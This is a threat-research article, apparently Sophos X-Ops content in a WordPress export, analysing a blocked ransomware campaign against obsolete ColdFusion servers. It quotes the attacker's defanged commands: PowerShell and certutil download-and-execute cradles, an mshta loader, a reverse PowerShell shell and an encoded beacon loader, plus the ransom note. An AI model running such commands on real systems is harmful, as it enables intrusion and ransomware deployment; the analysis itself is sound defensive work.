{"id":23163,"date":"2023-10-19T05:21:04","date_gmt":"2023-10-19T13:21:04","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2023\/10\/19\/news-16893\/"},"modified":"2023-10-19T05:21:04","modified_gmt":"2023-10-19T13:21:04","slug":"news-16893","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2023\/10\/19\/news-16893\/","title":{"rendered":"Ransomware actor exploits unsupported ColdFusion servers\u2014but comes away empty-handed"},"content":{"rendered":"

Credit to Author: rajeshnataraj| Date: Thu, 19 Oct 2023 11:00:35 +0000<\/strong><\/p>\n

\n

Servers are always a point of interest for threat actors as they are one of the most efficient attack vectors to penetrate an organization. Server-related accounts often have the highest privilege levels, making lateral movement to other machines in the network easily achievable.<\/p>\n

Sophos X-Ops has observed a wide variety of threats being delivered to servers, with the most common payloads being Cobalt Strike Beacons, ransomware, fileless PowerShell backdoors, miners, and webshells.\u00a0 In September and early October, we saw several efforts by a previously unknown actor to leverage vulnerabilities in obsolete, unsupported versions of Adobe\u2019s ColdFusion Server software to gain access to the Windows servers they ran on and pivot to deploying ransomware. None of these attacks were successful, but they provided telemetry that allowed us to associate them with a single actor or group of actors, and to retrieve the payloads they attempted to deploy.<\/p>\n

The files we retrieved showed that the attacker was trying to deploy ransomware created using leaked source code from the LockBit 3.0 ransomware family.\u00a0 We noticed similar ransomware being used in a WS-FTP exploitation campaign. In this report, I\u2019ll discuss the telemetry observed in one Sophos customer’s network and the tools and techniques used. Fortunately, all attempts were blocked by Sophos endpoint behavioral detections that caught suspicious \u201cliving off the land binary\u201d (LoLBIN) process initiations originating from the targeted servers.<\/p>\n

Attack timeline<\/h3>\n

Because ColdFusion 11 is no longer patched, and telemetry from the server\u2019s network connections were not available, we were unable to determine which vulnerability was exploited to begin the infiltration of the customer\u2019s network. But shortly after gaining access on September 20, the attackers began testing to see if they could exploit the server further with a series of command-line entries executed leveraging the ColdFusion Server processes:<\/p>\n

\"Figure<\/a>
Figure 1: A timeline of the attack analyzed in this report. Others occurred before and after this timeframe, starting September 16 and continuing until at least October 5. All times are UTC.<\/figcaption><\/figure>\n

At 08:30 UTC on September 20, the attacker executes a ping command directed at a host controlled by the attacker\u2014a subdomain of \u201coastify[.]com,\u201d which is connected to the Burp Collaborator Server, a service used for out-of-band application security testing (OAST), an external vulnerability detection toolkit. \u00a0This command, intended to test whether the server was vulnerable to a remote attack, was silently detected and permitted by the server\u2019s endpoint protection:<\/p>\n

\u00a0cmd \/c \"ping mc2a1coghq275g3y1qhnp5u2otukid62[.]oastify[.]com<\/pre>\n
Next, at 08:38\u2014after determining that the server could connect to a remote domain\u2014the attacker attempted to execute a remote PowerShell script to download and deploy a Cobalt Strike \u201cbeacon\u201d:<\/p>\n
cmd \/c \"powershell -nop -exec bypass -c \"iex ((new-object net.webclient).downloadstring('hxxp:\/\/<ip>:64\/watchdogs.ps1'))<\/pre>\n
This action is blocked by a behavioral rule Access_3b (based on MITRE ATT&CK technique T1190<\/a>). The attacker persists with multiple attempts to deploy the Cobalt Strike Beacon, but their efforts continue to be thwarted by the “Access_3b” rule.<\/p>\n
Consequently, at 11:37 the attacker again performed a DNS lookup with the \u201cping\u201d command for a different subdomain of oastify[.]com, double-checking that the targeted server can connect to a remote domain.<\/p>\n
cmd \/c \"ping oh9c6etims79ai806smpu7z4tvzmnhb6[.]oastify[.]com<\/pre>\n
The DNS test was once again positive, at 11:45 the attacker attempted to use the Windows command-line Certificate Services utility certutil.exe to drop another launch an executable version of the CobaltStrike beacon. Again, this was blocked by the Access_3b (T1190) behavioral rule.<\/p>\n
cmd \/c \"certutil.exe -urlcache -split -f hxxp:\/\/<ip>:64\/ftps.exe c:windowstempftps.exe & start c:windowstempftps.exe<\/pre>\n
The attacker tried this multiple times. But at 11:52, the attacker abandoned that method and attempted to deploy an interactive reverse PowerShell\u2014a fileless PowerShell backdoor intended to operate in the background and execute commands at the attacker’s discretion. Regrettably (for them), this payload deployment also proved unsuccessful, blocked by the same behavioral rule.<\/p>\n
cmd \/c \"powershell -nop -exec bypass -c \"iex (new-object net.webclient).downloadstring('hxxp:\/\/<ip>:64\/invoke-powershelltcp.ps1');invoke-powershelltcp -reverse -ipaddress <ip> -port 585<\/pre>\n
At 12:01, the attacker shifted their strategy again. Their previous efforts involved downloading a PowerShell file and then executing its contents; now they attempted to load an encoded Cobalt Strike Beacon loader directly into memory with PowerShell. Unfortunately for them, even this modified deployment method was blocked.<\/p>\n
$s=new-object io.memorystream(,convert]::frombase64string(\"h4siaaaaaaaa\/61xaw\/ishb9npwkf4gekiqm7lxrs89gsxmz2gwml4qkcmekvjblypom\/\/tuguinp9mzlc1eqq6y73lq3kvude.. -<\/pre>\n
Their efforts foiled, the attacker waited five days to return to the server armed with newly compiled binaries and a fresh remote attack vector in an attempt to circumvent the existing protections.\u00a0On September 25 at 07:47, they tried their original attack method again\u2014and met with the same outcome. The deployment was blocked.<\/p>\n
cmd \/c \"powershell -nop -exec bypass -c \"iex ((new-object net.webclient).downloadstring('hxxp:\/\/<ip>:64\/watchdogs.ps1'))<\/pre>\n
The next day, they started all over again, with a 01:16 \u201cping\u201d test against another random subdomain of oastify[.]com. At 01:23, they attempted again to load an encoded Cobalt Strike Beacon into memory, with further code modifications to evade detection. Once again, it was blocked.<\/p>\n
$s=new-object io.memorystream(,[convert]::frombase64string(\"h4siaaaaaaaa\/61xaw\/ishb9npwkf4gekiqm7lxrs89gsxmz2gwml4qkcmekvjb.. -<\/pre>\n
After that failed, at 01:31, they once again tried to leverage certutil.exe to deploy another newly compiled beacon. The attacker’s efforts continued to be thwarted.<\/p>\n
cmd \/c \"certutil.exe -urlcache -split -f hxxp:\/\/<ip>:64\/ftpss.exe c:windowstempftpss.exe & start c:windowstempftpss.exe<\/pre>\n
Running out of options, at \u00a002:27 on September 26, the attacker employed an HTA (HTML Application) file to initiate PowerShell, with the aim of deploying the Cobalt Strike Beacon. However, this attempt also ended in failure as it got blocked by another behavioral rule (C2_10a, based on ATT&CK technique T1071.001<\/a>)<\/p>\n
cmd \/c \"mshta hxxp:\/\/<ip>:64\/evil.hta<\/pre>\n
The threat actor, becoming more desperate, made numerous additional attempts to launch their attacks using HTA files and Cobalt Strike binaries. Frustratingly for them, all of their efforts were consistently thwarted and blocked.<\/h3>\n
Exploring the attacker\u2019s repository
 Following the telemetry trail, we found attackers unintentionally left directory listings enabled on the web server hosting their repository of tools, allowing us to explore its contents. Within it, we discovered all the artifacts the attacker had attempted to deploy in the customer environment\u2014as well as the final ransomware payload that the attacker intended to deploy, also sourced from the repository. (All of the payloads we discovered are blocked by Sophos\u2019 defenses.)<\/p>\n
\"Figure<\/a>
Figure 2. A directory of the ransomware actor\u2019s repository on October 10. Note that the ransomware has been renamed and Monero mining malware has been added to the repository.<\/figcaption><\/figure>\n
The ransomware variant, as noted earlier, carries a ransomware note crediting \u201cBlackDog 2023,\u201d and appears to be a new family of ransomware with a possible link to the leaked source code of Lockbit 3.0. This connection becomes apparent when examining both the static executable file\u2019s properties and the similarities in the unpacked code in memory.\u00a0 It triggers the same in-memory protection as that source, Mem\/Lockbit-B.<\/p>\n
The actor called themselves \u201cBlackDogs 2023\u201d in the ransom note file that was part of the unsuccessful malware payload:<\/p>\n
BlackDogs 2023 comming   Your data are stolen and encrypted  Please give me 205 Monero and we will give you the decryption program.  Our Monero address : [redacted]   The data will be published on TOR website if you do not pay the ransom   Your personal DECRYPTION ID: [redacted]    Warning! Do not DELETE or MODIFY any files, it can lead to recovery problems!  Using Tox messenger, we will never know your real name, it means your privacy is guaranteed.  If you want to contact us, write in tox. [address redacted]      <\/pre>\n
205 Monero is roughly the equivalent of $30,000 US.<\/p>\n
Artifacts Coverage<\/h3>\n
 <\/p>\n
These artifacts and other indicators of compromise will also be made available on our GitHub<\/a>.<\/p>\n
 <\/p>\n
The risks of this old software<\/h3>\n
Judging by the server installation directory that was exploited in the attack (C:ColdFusion11cfusionbincoldfusion.exe), it’s evident that the customers targeted were utilizing ColdFusion 11.x, a version introduced around 2014. \u00a0Adobe officially ceased support for this product as of April<\/a> 30, 2021, so no additional bug fixes or updates are available for this version. It\u2019s uncertain which vulnerability in the server was exploited, but they are numerous.<\/p>\n
While end-point protection can help prevent attackers from leveraging vulnerabilities in old software, there\u2019s no way to close the entry point without patches or updates. That weakens overall protection. It is strongly recommended that customers migrate to newer versions of any internet-facing server product or consider retiring them in favor of a still-supported alternative. Where that is not possible, organizations should do as much as possible to mitigate vulnerabilities, isolating servers hosting them from the organization\u2019s network as much as possible and restricting the rights of credentials on those servers to prevent lateral movement if they must reside on the same network.<\/p>\n
Sophos X-Ops would like to acknowledge Mike Wood and Anand Ajjan for their review and feedback on this report.<\/h4>\n
 <\/p>\n
 <\/p>\n<\/p><\/div>\n
http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
<\/p>\n
Credit to Author: rajeshnataraj| Date: Thu, 19 Oct 2023 11:00:35 +0000<\/strong><\/p>\n
Multiple LockBit knock-off attacks in September targeting obsolete software foiled, exposing tactics and tools.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[30354,15826,129,25671,27339,27030,16771],"class_list":["post-23163","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-adobe-coldfusion","tag-cryptominers","tag-featured","tag-lockbit-ransomware","tag-lolbins","tag-sophos-x-ops","tag-threat-research"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/23163","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=23163"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/23163\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=23163"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=23163"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=23163"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}